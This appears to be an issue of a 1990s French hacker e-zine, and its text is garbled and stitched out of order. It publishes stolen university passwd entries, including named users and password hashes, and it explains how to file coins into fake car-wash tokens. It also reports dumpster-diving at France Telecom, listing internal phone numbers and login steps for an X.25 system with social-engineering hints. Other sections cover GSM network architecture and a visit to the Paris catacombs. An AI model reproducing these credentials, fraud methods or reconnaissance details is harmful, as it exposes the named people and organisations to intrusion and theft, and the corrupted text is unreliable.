_.edu/software/sysprog/troot:/umr/bin/tcsh ff:kerberos:1017:5000:Bruce McMillin:/afs/umr.�_) Suite a mon article du N�1 j'ai re�u plusieurs mails me disant: "ouais c'est kewl ta rubrique mais j'aimerais que tu nous montres la methode pour l'avoir.��`�.:178:20:Graham Titmus:/homes/gt:/bin/csh ckh:lbuRVWtVkFX5w:1167:20:Chris Hadley:/homes/ckh:/usr/bin/bash rocket.dotcom. patati patata .uk: Computer LABORATORY university of CAMBRIDGE **************** root:RK2fP/SciTdfE:0:1:Root:/:/bin/sh daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: uucp:*:4:39:UUCP/FAX gateway:/var/spool/fax: fax:*:4:39:Facsimile Agent:/var/spool/fax: tcb:*:9:18:Trusted Computing Base:/tcb: adm:*:10:32:Administration Subsystem:/usr/adm:sr/opt/amanda:/dev/null ileaf:*:79:1:Interleaf:/usr/groups/interleaf:/dev/null sendmail:*:83:1:Sendmail:/:/dev/null mentor:v3r/pSTrKCz0w:89:72:Mentor:/usr/groups/mentor:/dev/null maj:KyaXu2IXS07oA:101:20:Martyn Johnson:/home/maj:/usr/bin/bash pb:rL999AvVVuudM:104:20:Piete Brooks:/home/pb:/usr/bin/bash gt19:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash gt:u1/WUQKpCFVlk:178:20:Graham Titmus:/homes/gt:/usr/bin/bash gtcsh:ZoaJBDqJXVMq.cl._. cgi etc .��`'�.�'��) ) Password FILE ) 2._.edu/users/jlu:/umr/bin/tcsh rms:kerberos:5002:5000:Richard . et l'autre aux States (petit coucou aux admins).umr.��(_�.��`�.) alors je vais pas reexpliquer ces methodes archi maintes fois rabach�es ! Bon bah ce mois ci je vous donne 2 passwords file d'universit� l'un en Angleterre.�'��)�.��`�.8 ( Aaah@mail.(�`'�..cc.��`�._. les m�thodes n'ont absolumnent rien d'extraordinaires ces des exploits connus qu'on peut trouver sur rootshell et compagnie (bug sendmail.fr ( (_�.edu: Un server de l'universite du Missouri-Rolla ***************** root:9ZW.�_)`'�.�_.edu/users/ff:/bin/csh jlu:kerberos:2435:5000:Jui-Lin Lu:/afs/umr.1690 | COLT 1696 | ECONOPHONE (�`'�..dotcom." A ceux l� je reponds par 2 choses : un articles sur les exploits UNIX est en preparation._..cam.�(�`'�.ILIJpPQ72:0:3::/:/sbin/sh daemon:*:1:5::/:/sbin/sh bin:*:2:2::/usr/bin:/sbin/sh troot:kerberos:0:0:AFS Base Root User:/afs/umr. Je lance aussi un grand sondage pour ou contre cette rubrique vous m'envoyez votre vote sur Aaah@mail.�'�(_�.�'�`�.�_)`�.� �.fr SI YA MOINS DE 10 VOTES J'ARRETE CETTE RUBRIQUE ! ========================================================================== www._.ac..�'��).��`�._�.��`�.�'��`'�.

par exemple injecter de l eau dans le monnayeur grace a la lance ou a passer un tournevis pour provoquer un court- circuit dans la partie electronique. non. D' ou l excellente idee de produire un jeton universel.Le systeme de detection de la piece est base sur trois principes: * Mesure de l epaisseur * Mesure de la largeur * Identification de l alliage Il ne reste plus qu a fabriquer ses jetons.Vous me direz a quoi sert de payer des ingenieurs ? Les modifications a apporter a cette piece sont minimes.9 ( ced99 ( (_�.�'�(_�.�(�`'�. non ! D' autres methodes pour cracker ces monnayeurs existent.Bizarre.fr (�`'�.��(_�.��`'�.Et puis PEACE and LOVE nous ne sommes pas des vandales. Aaah@mail. En fait la piece de 50 centimes lui ressemble etrangement.�'�`�.��`�.dotcom. Cette societe est tres bien implantee en FRance et en Europe. -=- Je compte sur vos contributions ou collaborations._._. Ces procedes sont peu fiables et aleatoires.�_)`�._.�'��`'�.(�`'�.Comme une station de lavage coute tres chere.Mais en regardant de plus pres ce fameux jeton on s' apercoit qu il nous est tres familier.��`�._.��`�.Commencez par usiner le contour de la .��`�._.Ceci est un r�sum� du password file en effet il y 1500 logins avec KERBEROS._�.�_) INTRO Les stations de lavage Elephant bleu sont gerees par la societe Hypromat lavage.� �. Le plus difficile est l alliage.��`�._. Facile.�_)`'�.�'��). le seul materiel a utiliser est une meule ou une lime si le courage vous en dit. Kerberos k'est ce que c'est ? c'est un systeme de password temporaire qui change tres souvent. Mais prenez plutot une meule c est plus rapide. d'ou la pr�sence de kerberos a l'emplacement du password crypt�.�_.�'��) ) Elephant bleu ) 2.�'��)�.��`�. CONCEPTION Donc il ne reste plus qu' a fabriquer ces jetons. hypromat utilise des monnayeurs peu perfectionnes.

_. La qualite et la disponibilte du service etant liees a la qualite des communications ._. UNE fois de plus attention.��`�.ATTENTION a ne pas trop usiner la piece sinon apres la piece ne sera plus reconnue.�_)`�.(�`'�. ca va tres vite. En France. La liaison entre telephones mobiles s' effectue via des stations relais radio.�'��) ) Paris Underground ) 2. non confidentialite des communications. cela ne veut pas dire qu elle ne passe pas dans celui d'a cote. et utilisables partout en Europe.��`�. L' evolution rapide du marche a favorise la creation de portables de petite taille._�. appelee cellule.� �.��`�.�_) GSM. standard europeen de la telephonie mobile Le systeme GSM (Global System for Mobile communications) a ete defini a la fin des annees 80 par des operateurs et des industriels reunis par l' Etsi (European Telecommunications Standard Institute). Le seul moyen pour hypromat de contrer cette fraude serait deja de renvoyer les monnayeurs pour les retalonner plus precisement (seules 3 societes en france reprogramment les monnayeurs).�_. L' objectif etait de creer une norme eyropeenne de telephonie cellulaire numerique palliant les lacunes des systemes de telephonie cellulaire analogique (taille importante des mobiles. il faut eliminer le petit rebord autour de la piece. La deuxieme etape est d' usiner les 2 faces.�'��)�. l' usinage doit etre etre tres minutieux._.�_)`'�.��`�. Ainsi.��`�. Chacune d' elles assure la communication radio avec les mobiles dans une zone geographique precise. 3 operateurs ont obtenu une licence permettant de developper un reseau GSM. sauf aux Etast-Unis.Avec l habitude. ou les technologies CDMA-TDMA dominent.ils faut les faire disparaitre entierement. BY ELEPHANT MAN FOR CRYPTEL. Cette modification fonctionne pour le lavage (equivaut a une piece de 10 frs) mais aussi pour l aspirateur dans certains centre de lavage. Bouygues Telecom.�'��). Si une piece ne passe pas dans un monnayeur.�'�(_�._. La norme GSM constitue aujourd' hui une reference mondiale.��`'�.piece. (�`'�. voir CRYPTEL #1). INFOS: Certaines pieces provenant des antilles et de la polynesie francaise sont reconnues dans certains distributeurs comme des pieces de 20 frs. France Telecom Mobiles et SFR developpent constamment l' infrastrucutre de leur reseau._._. ATTENTION a ne pas utiliser ces pieces lorsque le cum qui remplit les bidons de savon est dans le coin.��`�.�'��`'�. c' est a dire les equipements qui raccordent les telephones mobiles au RTC (Reseau telephonique commute. incompatibilite entre les pays.A l origine cette piece possede des peites fentes.�'�`�. Usinez plusieurs pieces et essayez-les.��(_�. offrant une bonne qualite d' ecoute. Le resultat n est pas sur a 100%.�(�`'�. et efficacite spectrale faible).10 ( vatoo ( (_�. de changer ces jetons qui ont a peine un an de service et ki sont distribues dans toute l' europe.

Itineris et SFR de couvrir la France. L' interface mobile-NSS est appelee interface Air. sous-systeme radio constitue de plusieurs types d' equipements. Elle offre une bonne qualite de service grace a la transmission numerique et au codage de la voix. En revanche. chiffrement et transcodage GSM-MIC. codage canal. Les couples (frequence et intervalle de temps) constituent les ressources radio physiques qui sont attribuees par configuration aux differents canaux logiques de controle. La gestion de la mobilite est une autre fonction essentielle de ce type de reseau. une architecture complexe L' utilisateur peut appeler un correspondant (et etre appele) quelle que soit la cellule dans laquelle il se trouve. appelee la gestion des ressources radio (RR). La confidentialite des communications est assuree par le chiffrement des echanges. dont les BTS. qui inclut la localisation des mobiles en veille ainsi que l' etablissement et la maintien des comms pendant un deplacement (hand-over). Cela permet aux reseaux Bouygues Telecom. Le PLMN. Cette fonction. se deploient dans un rayon large (35 km environ). le sous-systeme d' acheminement dans le reseau (NSS). il est necessaire soit d' augmenter la puissance des mobiles (ce qui en augmente la taille). il est necessaire d' allouer dynamiquement les differentes ressources physiques aux echanges logiques relatifs aux abonnes presents dans les cellules. Le premier est un modem qui assure la gestion des ressources radio indispensables aux echanges avec les mobiles. le traitement du signal de parole (modulation. de signalisation et de trafics necessaires aux echanges entre les mobiles et les BSS. ou PLMN. est composee de trois sous-systemes: le sous-systeme radio (BSS). ou le trafic est beaucoup plus important. L' infrastructure d' un reseau de telephonie mobile. fournit une meilleure efficacite spectrale que ne le faisaient les anciens systemes analogiques de telephonie mobile. le sous-systeme d' exploitation (OSS). on obtient une decoupe des trames en 8 intervalles de temps. sans que les interfaces ne viennent parasiter les communications. Ainsi se sont installees sur le toit des immeubles des antennes assurant la communication avec les mobiles. et. Ils effectuent egalement le multiplexage des trames TDMA. Les BTS sont les stations de base qui assurent le couplage radio avec les mobiles sur l' interface Air. modulation par impulsion et codage) ainsi que les mesures de puissance des mobiles pour assurer une bonne qualite de communication. L' interface Air est caracterisee par un schema d' acces multiple a la fois frequentiel et temporel. Sur chaque frequence emise par un relais radio. qui a pour nom TDMA. auquel est attribue un ensemble distinct de frequences. L' ensemble des cellules du reseau d' un operateur forme le PLMN. moins nombreuses. les cellules. soit de multiplier le nombre de ces stations relais radio. les cellules couvrent une superficie reduite (300m de rayon environ).radio. demodulation. Les BTS sont pilotes . La repartition geographique des relais radio depend de la densite de trafic estimee. enfin. Elle acroit la capacite de trafic et le nombre d' utilisateurs du reseau de telephonie mobile. S' il est impossible d' affecter de maniere fixe les canaux radio aux differents abonnes. en ville. A la campagne. On parle alors de microcellules. et le transfert des comms entre les mobiles et le NSS.

ou entre les mobiles. Pour la partie controle. lui. qui transmet l' appel au CAA auquel il est connecte. ils sont alors denommes GMSC ou passerelles MSC. le reseau de telephonie mobile dispose d' un centre d' authentification (AuC). Le commutateur. Il gere les ressources radio physique et les canaux logiques. Chaque MSC est couple a une base de donnees qui recueille les donnees d' acheminement relatives aux abonnes visiteurs situes dans une zone precise (VLR). et a un role de concentration et de commutation des comms. leur numero d' annuaire. Un NSS se compose des enormes bases de donnees relatives aux abonnes (HLR) et a la localisation des mobiles (VLR). de la connexion au reseau telephonique. Un PLMN pourra contenir un ou plusieurs HLR selon le nombre d' abonnes. NSS et BSS relies par interface normalisee Cet equipement gerant les cles de securite de chaque abonne est souvent situe sur la meme machine que le HLR. baptises MSC. Le centre d' identification (EIC. Sur ces liens transitent les comms vocales ou de donnees. leur identification. Cet organe intelligent du BSS concentre les circuits de parole et de donnees vers le sous-syteme d' acheminement dans le reseau NSS. Short message services). Le BSC administre la mobilite des abonnes entre les cellules qu' il pilote. ainsi que la signalisation BTS-BSC. et incluent les fonctions de traitement des appels (CC). Une deuxieme base de donnees (HLR) contient les infos relatives aux abonnes telles que les services souscrits. Mais depuis quelques annees. et alloue ces derniers aux appels qu' il traite. sous-systeme en charge du traitement d' appel. l' operateur d' un reseau de telephonie mobile (PLMN) peut utiliser sa propre infrastructure de transmission pour etablir des circuits de parole entre les MSC. La signalisation utilise le protocole LAPD (Link Access Protocol Digital) pour la couche de liaison de donnees. L' acheminement des appels est alors conduit par le PLMN jusqu' a un GMSC. lien entre le fixe et le mobile La deuxieme partie d' un reseau de telephonie mobile comprend le NSS. Le trafic entre les MSC peut etre achemine par le RTC. . et d' administration des services supplementaires (SS). Certains d' entre eux sont interfaces avec le centre a autonomie d' acheminement (CAA) du RTC. de gestion de la mobilite (MM). auxquels les fonctions specifiques du GSM ont ete ajoutees par les mecanismes de reseau intelligent. Il est interface avec plusieurs BSS. il realise le controle des mobiles. tant en matiere de puissance d' emission que de synchronisation temporelle. d' echange des messages courts (SMS. ainsi que la reference du VLR correspondant a la localisation de l' abonne. sont le plus souvent dotes des commutateurs du RTC. Enfin. Les commutateurs. Les BTS d' un BSS sont relies aux BSC par des liaisons MIC a 2 Mbit/s. et de la gestion des abonnes. MS-BSC et MS-MSC.par le controleur de station de base (BSC). Equipment Identification Center). Ils etablissent les appels entre les mobiles et les abonnes fixes.

Qu' est-ce que la puce SIM ? R. alloue par le sous-systeme radio (BSS) >>Etape3:Ce sous-systeme etablit une connexion SS7 avec le commutateur du reseau (MSC).contient les infos necessaires pour verifier que le mobile est autorise sur un reseau. Les controleurs des stations de base (BSC).>>Etape1:Quand un mobile fonctionne. Elle existe sous deux types de formats: carte de credit et miniature. >>Etape5:Le commutateur fournit au mobile une identite provisoire qui sera ensuite utilisee pour les echanges entre le mobile et le reseau. L' echange de signalisation entre les constituants du NSS est realise par le reseau semaphore SS7 associe au PLMN. les operateurs mettent en oeuvre une interface bptisee A. auquel a ete ajoute le protocole MAP (Mobile Application Part). >>Etape4:Quand le mobile a signale sa presence au commutateur MSC visit�. sont relies aux MSC par des liaisons MIC a 2 Mbit/s par lesquelles transitent les comms avec les mobiles et la signalisation MS-MSC ou BSC-MSC. le mobile demande un canal de signalisation dedie. celui-ci met l' identite du mobile dans les bases de donnees locales centralisees. Les divers MSC d' un PLMN sont aussi relies par des liaisons MIC. La carte SIM contient des caracteristiques du reseau (identite du PLMN et plage de frequences utilisee).Comment un utilisateur est-il identifie ? R. Pour relier les deux sous-reseaux. ils peuvent interconnecter les equipements NSS et BSS de differents constructeurs. eux. >>Etape2:Une fois que la station de base susceptible de lui fournir la meilleure qualite radio a ete retenue. Grace a cette normalisation. NSS et BSS. Q. des parametres d' abonnement . qui vehiculent les circuits de parole. qui constitue sa carte d' identite sur le reseau.Le mobile ecoute les infos systemes diffusees par les BTS pour recueillir toutes les infos sur le reseau. L' interface PLMN-RTC ou PLMN-RNIS est realisee par les passerelles GSMC connectees au CAA par des liaisons MIC a 2 Mbit/s et par le reseau semaphore SS7. La signalisation utilise les protocoles du reseau semaphore SS7 et une couche specifique au GSM. Cette carte renferme les informations necessaires pour acceder au reseau d' un operateur. appelee BSSAP. L' interface MSC-HLR est normalisee pour autoriser les echanges de signalisation entre PLMN lorsque les mobiles sont utilises a l' etranger. il parcourt les frequences et recherche les canaux de controle emis par les stations de base (BTS) afin de se synchroniser en frequence temporellement. Questions/reponses: Q.Chaque abonne GSM recoit une carte a puce denomme carte SIM (Subscriber Identification Module).

>>Etape10:Le BSS diffuse alors la recherche (numero provisoire du TMSI) sur toutes les stations de base (BTS). >>Etape7:La base de donnees centralisee informe le commutateur passerelle du numero provisoire pour pouvoir joindre directement le commutateur visite par le mobile. >>Etape4:Pour connaitre les informations sur l' abonne mobile. AB est l' indicatif attribue a chaque operateur (07 et 08 pour FT. >>Etape3:L' appel est aiguille vers le commutateur passerelle (GMSC) le plus proche du reseau mobile. 60 pour Bouygues. et MCDU l' abonne. ce commutateur passerelle interroge la base de donnees centralisee (HLR).Quelles sont les etapes d' un appel d' un mobile a un poste fixe? R->>Etape1:Le mobile utilise le canal de signalisation pour s' identifier aupres du reseau. qui est reserve pour les mobiles). et demander au commutateur visite l' etablissement de l' appel sortant. 09 pour SFR). >>Etape8:Le commutateur passerelle va etablir un appel vers le commutateur concerne. Q. >>Etape6:En retour.(identite internationale de l' abonne et services demandes). >>Etape2:L' analyse du numero de l' appelant dans la base de donnees . >>Etape5:Le HLR interroge a son tour la base de donnees locale (VLR) du commutateur (MSC) pour localiser le mobile. >>Etape2:L' appel est transmis au commutateur d' acheminement (CAA) auquel l' abonne fixe est connecte. >>Etape9:Le commutateur recherche le mobile en demandant une procedure de recherche (paging) au controleur de stations de base (BTS) du sous-systeme radio concerne (BSS). Celui-ci est de la forme ID Z AB PQ MCDU. >>Etape11:Une fois le mobile repere. des donnees de securite (mot de passe de l' abonne ainsi que cle d' authentification et de chiffrement).Quelles sont les etapes d' un appel d' un poste fixe a un mobile ? R->>Etape1:L' abonne du reseau de telephonie fixe compose le numero de l' abonne mobile (MSISDN). Z indique la zone (Z=06. etablir le chiffrement. des donnees temporaires comme les messages courts recus. L' ID est l' indicatif du pays (33 pour la France). le BSS lui alloue un canal de trafic. La conversation peut alors commencer (enfin!). Q. PQ identifie le HLR. des informations sur la mobilite (identite provisoire et indicateur de zones de focalisation) et. la base de donnees locale fournit a la base de donnees centralisee un numero provisoire (MSRN). Le circuit de parole est etabli entre le mobile et l' abonne fixe a travers ce canal de trafic. enfin.

Une liste des badges ayant acces � certains niveaux de s�curit� dans le batiment.��(_�. Tan Tan Tan. on aura tout eu dans celle l� . et la communication peut alors s' etablir.) .(�`'�.��`�. et le canal de trafic est libere.centralisee permet au commutateur de constater que le numero appartient au reseau fixe.. >>Etape4:La base de donnees HLR communique cette adresse au commutateur MSC relie au BSS.. la neige.Le journal syndical de la CGT : NON AU 35 HEURES ! (�a promet) .�(�`'�. >>Etape5:Le commutateur aiguille alors l' appel vers ce commutateur passerelle MSC. Tan Tan Tan h�roique non ? :-) Bon ca a pas ete une mince affaire parce que la poubelle que je visais ce soir l� etait en plein champs de vision du gardien .��`�. >>Etape3:La base de donnees centralisee (HLR) recherche l' adresse du commutateur passerelle (GMSC) auquel est rattache l' abonne fixe._. >>Etape6:L' appel est route vers le centre d' acheminement auquel l' abonne fixe est connecte..�'��). l'ouragan..��`�.. un dialogue de fin d' appel se deroule entre le commutateur et le mobile.J'oubliais l'apot�ose un mail envoy� a une employ� qui ressemblait fort a une invitation dans un secte ("venez entendre la voie de la raison") Plus s�rieusement j'ai trouv� quelque trucs interressants : .._._�.� �.�_) Malgre les -10�c.��`�.Du d�tergeant chimique (�a c pas cool j'ai eu des taches . le gele. le froid.��`�. le vent. et le circuit de parole est etabli entre le mobile et l' abonne fixe. >>Etape7:Le centre d' acheminement entre en contact avec l' appele. . dur . enfin j'ai profit� d'un instant ou il lavait sa vitre pour m'emparer d'un sac poubelle et disparaitre dans la nuit pour aller accomplir mon devoir .�'��)�. Je ne la publierai pas tout simplement parce qu'elle ne sera .. (�`'�. sous-systeme radio sur lequel l' utilisateur mobile est raccorde._. le verglas. le cyclone.��`'�.��`�.�'�`�.�_)`'�.fr ( (_�.. le typhon.Une tonne indescriptible de m�gots et cendres (zont nerveux chez ft ?) .�'��) ) TrAsH FT ) 2..11 ( Aaah@mail.�'��`'�.. Bon alors y avait pas mal de truc dans cette poubelle on va commencer par les trucs FUN : .Un CD-Rom en cours d'analyse (bah oui il est abim�) une chose est sur le parc informatique pour les employ�s de FT c win 98/95 et NT ._..et cerise sur le gateau : du pq .._. >>Etape8:Le commutateur demande au sous-systeme radio (BSS) d' allouer un canal de trafic._. >>Etape finale:Lorsque l' un des deux abonnes raccroche. la d�pression polaire arctique et antarctique (bon on va peut etre s'arreter l�) Aaah a brav� les intemp�ries pour aller trasher chez FT. >>Etape9:Le canal de signalisation est libere.�_.�'�(_�.dotcom.�_)`�. la pluie.

Je vous publie cette liste si qqun aurait la d�finition de certains trucs ou peut tout simplement �clairer ma lanterne.Une liste (celle ci beaucoup plus instructives) comprenant plusieurs N� de tel et jargon technique que je n'arrive pas � d�finir.dotcom.P.B 206401 / 0142446262 ======================================================================= Beauvais Amiens CPE: 0344841392 ======================================================================= Bercenay 267114 ======================================================================= Besancon 207111/257444/257448 0381801389 257455 277449 ======================================================================= Bessancourt Eragny 209 111 / 209 356 0130403904 ======================================================================= Bordeaux 243111/243408/243404 0557813401 S 243444 243 429 ======================================================================= Bordeaux mer 243528 ======================================================================= Caen academie 231111/231608/231629 0231251120 0231251111 ======================================================================= Caen ven GET 231227/231228 0231251111 . d'aucune utilit� pour vous :-) et �a indiquera trop vite � FT ou j'ai trash� (quoi qu'a mon avis c facil � deviner) .I. un petit mail sera le bienvenu (Aaah@mail.fr) Nom du centre: CPRI: N� COLISEE FAX: RESEAU: ====================================================================== Amiens Lille 277 111 / 277 406 0322537280 0322537111 ====================================================================== Andilly 209 690 / 209 611 0134329608 0134329611 ====================================================================== Angers Nantes 0241607515 ====================================================================== Annecy 227225/227228/227457 0450667449 0450667444 227111/227459 ====================================================================== Archives Sebastopol 207460/207111/207419 0148017499 208123 7111 ====================================================================== Arpajon Villabe 0164900823 ======================================================================= Aubervilliers 215005/215111/215004 0148115111 215007 GEB 0143525718 ======================================================================= Auber DRIF 0143525150 GLM 0148341717 ======================================================================= Auber GEB 0143525113 ======================================================================= Auxerre Dijon GET: 0386493590 0386522941 ======================================================================= Bagnolet 268574 CONS: 268488 0149938574 ======================================================================= Bayonne 0559526196 ======================================================================= C.

0141675299 . si qqun veut la suite il me mail je lui envoie et il en profite pour m'expliquer un peu ce truc parce que l� j'avoue je nage . GLM. C'est dommage que j'ai 3 pages sur 69 mais bon je garde espoir de le retrouver entier lors d'un prochain trash :-) II Procedures de connexion et de deconnexion ******************************************** 1.. GSP etc . :-) ..0141675298 Fax: 0141675169 */C aaah la qui parle je vous demande de pas appeler ou tenter un social en ardos sans rien sous le bras grill�pas tout de suite ce num�ro\* L'ecran suivant apparait: ... (CPE? Colisee ? CONs.1 Connexion L'acces PM2 se fait viale r�seau x25.Un dernier tres interressant malheureusement je n'ai pas eu le fichier entier j'en ai que 3 pages : Le manuel utilisateur du PM2 � diffusion contr�l�e. Tapez le num�ro d'acces � PM2 sur votre terminal et validez ## ## ## Apres le message d'acceuil notifiant votre enregistrement tapez: CN MP2 Puis votre identifiant ###### ensuite votre mot de passe ###### Le mot de passe vous est d�livr� par la Direction d'apllication MP2 Tel: 0141375168 . GET. CONS: 231241 ======================================================================= Chartres Orleans CPE: 0237208739 ======================================================================= Chateauroux Tours 0247405381/82 ======================================================================= Chenneviers 219527/219528 CONS: -524 SUP: -523 0149629429 0149629111 ======================================================================= Chenne HZ 219402 ======================================================================= Clamecy Auxerre CPE: 0380303456 ======================================================================= Clermont FD 225832/225802 0473425700 ======================================================================= Corbeil Villabe 201111 commut: 201470 0169114513 ======================================================================= Creil Amiens 0344281020 ======================================================================= Dijon 256111/-454/-325/-258 CONS: 256455 ======================================================================= Douai Lille 254 359 ======================================================================= Echiquier Sebastopol 207111/207379/S:207719/ 207412 014817111 ======================================================================= Evreux CPETRAN: 0232315730 ======================================================================= Voil� �a c'est qu'une 1ere partie j'ai toute une liste des villes par ordre alphab�tique.

----Informations PM2-23B --------.EDITION DES PLANS DE CABLAGE .EDITION PARTIELLE DES COFFRETS 10. si qqun a mailez moi Autre page du manuel: DEMANDE D'EXTRACTION (suite) **************************** L'ecran suivant apparait: ------------------------- CREATION CTL:_____ SELECTION DES EDITIONS CODE SITE DESTINATAIRE:_ 1.EDITION DES SECTIONS D'UN CENTRE OU D'UN REPARTITEUR 6.EDITION DES SECTIONS AVEC ROUTAGE 7.EDITION DES BLOCS AVEC ROUTAGE 3... Sans vous preoccuper de positioner quelconque curseur tapez encore: PM2 Vous etes maintenant connecte a PM2 (voyez page suivante les ecran d'accueil que vous faites defiler en appuyant sur la touche TRANS ou RETURN et vous pouvez commencer toute consultation de votre choix (voir la liste des consultations possibles plus loin dans ce manuel) [FIN DE PAGE 6/69] j'ai pas la suite .ABANDON (nul): ************ INFO EXPLOITATION DU 14/01/98 ------------------------------------------ *************** Le numero du centre de calcul est le 0141675449 ******** Le 14/01/98 a 8h30 reste a reemettre: 378 os dans TEMILEX a 14h reste a reemettre: os dans TEMILEX PB pour reemission os du password = support FONCT 23B au 0141675295/96/97 PB password PM2 = support fonctionnel PM2 au 0141675168 ************************************************************************ INFO 23B du 09/01/98 --------------------------------------------------- ************************************************************************ * * * AUX UTILISATEURS: merci de signaler les incidents sur le V60 aux sup * * fonct un cadeau sur INF23B * * * ************************************************************************ INFO PM2 du 23/08/95 --------------------------------------------------- `INF` permet de consulter les numeros de FAX des destinataires RECTIF Modification du numero de FAX du centre CARNOT : 40545232 devient 44151212 ------------------------------------------------------------------------- Vous etes maintenant connecte au TDS de M2/23B.EDITION DES SECTIONS 5.EDITION DES BLOCS 2.MENU GENERAL --------.EDITION DES MOUVEMENTS DES CASES DE COFFRETS 11.EDITION DES ENSEMBLES DE SECURISATION 4.EDITION DES LIAISONS SPECIALISEES 12.EDITION DES TRONCONS 8.EDITION GLOBALE DES COFFRETS 9.

N'oubliez pas d'inscrire le champ <OBSERVATIONS> l'adresse ou devra etre envoy� le listing par la cellule PM2. La plupart des touristes etrangers n' ont aucune idee de ce qui se passe en ces lieux. traduit et adapte par vatoo. des galeries symetriques.fr.��`'�._.�_)`�. Je suis ici a Paris pour .�'��`'�.EDITION PARTIELLE DE BPN NUMERO D'EDITION: __ DERNIERE DEMANDE CREE: 09553 Tapez "G" (comme Noisy-le-Grand) dans le champ <CODE SITE DESTINATAIRE>. Remarque: certaines editions ne sont possibles qu'a partir du superviseur PM2. Nous apparaissons dans une grande allee._. si qqun a la doc (on sait jamais) + d'infos sur ce systeme.��(_�._.�_) Une visite du sombre monde sous la ville lumiere.�'�(_�. loin de notre point de depart. Il y a un grand nombre de citations.�_. La vision est fantastique . Telephonez [FIN PAGE 66/69] Voil� cette machine a l'air vraimment interessante._�.�'��)�.�(�`'�. choisissez l'edition qui vous interesse. Servez l'ecran correspondant � votre demande et validez les parametres que vous venez de saisir sur ce dernier �cran. vous qui ne pouvez compter sur un seul jour"._.(�`'�._. dont ma preferee: "Insense que vous etes. Pourquoi vous promettez-vous de vivre longtemps . 13.par murray battle.dotcom.� �. Une visite non-guidee des catacombes Parisiennes.�_)`'�. c' est tres sombre.��`�. Validez. Participez on va pas tout faire ! Resultat de trash RDV au num�ro 3 (�`'�.��`�. C' est un vrai contraste avec les reelles catacombes. telephonez au 0141675299 en donnant votre code demandeur et le num�ro de votre demande.��`�. il fait chaud. En vous mettant le lendemain en mode "MODIFICATION" et en rappelant votre demande vous saurez si votre demande a ete traitee.��`�. a ce que j' ai appris plus tard. Notez bien alors le num�ro d'�dition affich� � la ligne DERNIERE DEMANDE CREE c'est lui qyu vous permettra de modifier (type2 du contexte de travail) ou de supprimer (type 4 du contexte de travail) votre demande. et je me sens un peu impressionne. etc bah vous connaissez ma phrase rituelle : mailez moi Aaah@mail.des murs entiers d' os et de cranes entremeles. si vous avez demand� une sortie disquette.�'�`�.�'��) ) Paris Underground ) 2.��`�.�'��).EDITION DISPONIBILITE DES BLS 14.��`�.12 ( vatoo ( (_�._.

batteries jetees. Je le trouve inquietant. Une echelle rachitique mene vers le haut d un mur emiette. il y a une echelle. a un trou de lapin dans le plafond et. dans des bois eloignes. Je suis immediatement subjugue par la beaute de cet ensemble. Nous nous sommes rencontres sur le net et nous sommes a present assis face a face dans un cybercafe dans un quartier industriel de Paris.bouteilles en plastique. initier des neophytes. Ce n' est pas bon signe. J' attends le dernier moment pour mettre mon casque- torche de speleologie. Nous serrons un par un. La premiere est faite de craie. Emmanuel connait quelques caves qu' il desirerait nous montrer. Il n' y a pas d' echo. puits sans fond . dont l' anglais est aussi pietre que mon francais. Les autres nous rejoignent.totalement noir. Enfin Emmanuel me demande d' allumer ma lampe-torche pour lui permettre d' allumer . chacun arr�te sa lampe ou la lampe-torche pour se trouver dans l' obscurite . Ici. Rien. Pourquoi accelerer le processus? Emmanuel Gabily va me servir de guide dans l' underground. Et c'est un endroit pour faire le camp. Je n' ai pas une grande impression a ce sujet. Cela parait totalement irrationnel. Ce sont plus des cavernes que des tunnels. 6 pieds sous terre. Des machines sont abandonnees ici depuis des decennies. Lentement. Emmanuel est inquiet a propos de mes bottes. Nous finissons tous ici. Il pense qu' elles ne sont pas assez hautes. Pas de claustrophobie ici. Nous nous promenons dans la voiture d' Emmanuel. Notre guide nous mene par le labyrinthe en ayant jamais besoin d'une carte. des promesses d'Emmanuel.. Il y a pas loin un balcon . Aucune �goutture. alors que le paysage citadin de Paris disparait peu a peu.Il y a au-dessus de et ci- dessous et autre ci-dessous et. Heureusement.fissures soudaines. Vous ne devez pas fermer vos yeux. c' est tridimensionnel. >>La cave de craie Nous sommes rejoints par trois autres cataphiles hommes. Nous nous asseyons pour nous reposer. L' entree est en fait une fissure de roche.. RIEN!! Je n'ai jamais eprouve quelque chose comme ca. Il dirige sa lampe aux points de danger . qui adore. bidons. Emmanuel laisse sortir un cri .une vue ouverte de la ligne des tunnels ci-dessous. Nous entrons dans la banlieue. a un niveau superieur.aucuns rails de guide ici. Mais maintenant je comprends pourquoi on vient ici. On observe des signes de visitation precedent . Emmanuel n' est pas seul. sans instruction. dans la mesure ou vous pouvez aller. tout comme Emmanuel.quelque chose qu' apparement il execute a chaque descente. d' a peu pres 10 m de hauteur. Il est accompagne d' un garcon denomme Benito (Benjamin Nitot). Le tombeau d'un homme est le refuge d'un autre homme. Ca semble bien indique mais je ne pourrais jamais retrouver mon chemin arri�re. Pas un bruit. Les murs de craie absorbent tout.comprendre pourquoi les gens vont dans ces sous-sols. Et silencieux.

" il ose. Ils ne vont pas loin. Emmanuel les interroge. C' etaient des caves. C' etait un veritable desordre organique. Stephane. L' entree est vraiment etroite. Emmanuel et deux nouveaux m' attendaient au coin d' une rue de la banlieue. caracterise par des sculptures sur les murs. Ils se dirigent vers une petite entree. " Quelques km de carriere de pierre a chaux plus tard. Au retour d' Emmanuel. Ca n' etait pas sur ma carte. un peu perdu. Ils devraient mieux ne pas aller trop loin s' ils ne veulent pas se perdre. La scene etait digne de ' L' Exorciste '. Il doit etre 5 ou 6 h du matin. au moins. de serieux. . en fran�ais et anglais. trentaine d' annees. il y a une piece. Emmanuel se fraye un chemin jusqu' a un mur de briques . sous un lycee pres des jardins du luxembourgeois. d' important. Mais trois jeunes garcons attachent un velo a un poteau et inclinent la tete. mais c'est notre monde. encore une fois. nous sautons a cloche-pied une barriere pour nous retrouver dans une autre carriere. et me controlent poliment a l' exterieur. une sorte de station. vingtaine d' annees. et je ne blesse personne. Je pense � Robert Smithston. Les trois jeunes emergent.cette fois sous la terre.. Je ne me blesse pas. J' avais l' impression que la nuit precedente n' etait en fait qu' un test pour quelque chose. sans avoir l' air etonne.. Notre salle d' attente a une nuance de. Je m' etale au sol. Il y a une culture. suivi d'un rire explosif. Ils n' ont pas de carte. alors que l' aube se cassait sur l' horizon de la ville. Un autre moment magique. Cette fois taille dans un bloc de ciment. Benito ronfle profondement sur le siege arriere. puis j' ai marche. Les autres commencent un feu avec du propane liquide et 